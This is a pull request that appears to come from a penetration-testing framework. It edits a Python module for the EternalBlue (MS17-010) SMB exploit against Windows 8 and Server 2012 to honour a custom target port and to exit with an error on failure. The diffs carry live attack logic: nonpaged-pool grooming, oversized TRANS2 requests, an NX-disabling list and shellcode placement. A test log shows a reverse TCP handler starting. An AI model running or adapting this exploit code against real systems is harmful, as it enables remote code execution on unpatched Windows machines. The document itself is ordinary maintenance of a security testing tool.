### PR TITLE
Print connection errors and fix RPORT in Python ETERNALBLUE

### DIFF
--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -563,10 +563,10 @@ def _exploit(target, port, feaList, shellcode, numGroomConn, username, password)
         build = int(server_os.split()[-1])
         if build >= 14393:  # version 1607
             module.log('This exploit does not support this build: {} >= 14393'.format(build), 'error')
-            sys.exit()
+            sys.exit(1)
     elif not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")):
         module.log('This exploit does not support this target: {}'.format(server_os), 'error')
-        sys.exit()
+        sys.exit(1)
 
     tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
 
@@ -665,7 +665,7 @@ def exploit(args):
 
     if len(sc) > 0xe80:
         module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')
-        sys.exit()
+        sys.exit(1)
 
     # Now, shellcode is known. create a feaList
     feaList = createFeaList(len(sc))

--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -678,6 +678,7 @@ def exploit(args):
     # XXX: Catch everything until we know better
     except Exception as e:
         module.log(str(e), 'error')
+        sys.exit(1)
 
     module.log('done')
 

--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -345,15 +345,15 @@ def sendEcho(conn, tid, data):
 # override SMB.neg_session() to allow forcing ntlm authentication
 if not dependencies_missing:
     class MYSMB(smb.SMB):
-        def __init__(self, remote_host, use_ntlmv2=True):
+        def __init__(self, remote_host, port, use_ntlmv2=True):
             self.__use_ntlmv2 = use_ntlmv2
-            smb.SMB.__init__(self, remote_host, remote_host)
+            smb.SMB.__init__(self, remote_host, remote_host, sess_port = port)
 
         def neg_session(self, extended_security = True, negPacket = None):
             smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
 
-def createSessionAllocNonPaged(target, size, username, password):
-    conn = MYSMB(target, use_ntlmv2=False)  # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set
+def createSessionAllocNonPaged(target, port, size, username, password):
+    conn = MYSMB(target, port, use_ntlmv2=False)  # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set
     _, flags2 = conn.get_flags()
     # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16
     if size >= 0xffff:
@@ -555,7 +555,7 @@ def createConnectionWithBigSMBFirst80(target, port, for_nx=False):
 
 def _exploit(target, port, feaList, shellcode, numGroomConn, username, password):
     # force using smb.SMB for SMB1
-    conn = smb.SMB(target, target)
+    conn = smb.SMB(target, target, sess_port = port)
     conn.login(username, password)
     server_os = conn.get_server_os()
     module.log('Target OS: '+server_os)
@@ -575,14 +575,14 @@ def _exploit(target, port, feaList, shellcode, numGroomConn, username, password)
     progress = send_big_trans2(conn, tid, 0, feaList, '\x00'*30, len(feaList)%4096, False)
 
     # Another TRANS2_OPEN2 (0) with special feaList for disabling NX
-    nxconn = smb.SMB(target, target)
+    nxconn = smb.SMB(target, target, sess_port = port)
     nxconn.login(username, password)
     nxtid = nxconn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
     nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\x00'*30, len(feaList)%4096, False)
 
     # create some big buffer at server
     # this buffer MUST NOT be big enough for overflown buffer
-    allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x2010, username, password)
+    allocConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE - 0x2010, username, password)
 
     # groom nonpaged pool
     # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one
@@ -593,7 +593,7 @@ def _exploit(target, port, feaList, shellcode, numGroomConn, username, password)
 
     # create buffer size NTFEA_SIZE at server
     # this buffer will be replaced by overflown buffer
-    holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE-0x10, username, password)
+    holeConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE-0x10, username, password)
     # disconnect allocConn to free buffer
     # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer
     allocConn.get_socket().close()

--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -673,7 +673,12 @@ def exploit(args):
     module.log('shellcode size: {:d}'.format(len(sc)))
     module.log('numGroomConn: {:d}'.format(numGroomConn))
 
-    _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)
+    try:
+        _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)
+    # XXX: Catch everything until we know better
+    except Exception as e:
+        module.log(str(e), 'error')
+
     module.log('done')
 
 

--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -652,7 +652,7 @@ def _exploit(target, port, feaList, shellcode, numGroomConn, username, password)
 def exploit(args):
     if dependencies_missing:
         module.log('Module dependencies (impacket) missing, cannot continue', 'error')
-        return
+        sys.exit(1)
 
     # XXX: Normalize strings to ints and unset options to empty strings
     rport = int(args['RPORT'])


### PR DESCRIPTION
- [x] Test newly printed connection errors
- [x] Test `RPORT`

```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[-] [Errno Connection error (127.0.0.1:4455)] [Errno 61] Connection refused
[-] Exploit aborted due to failure: unknown: Module exited abnormally
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) >
```

Fixes #10310.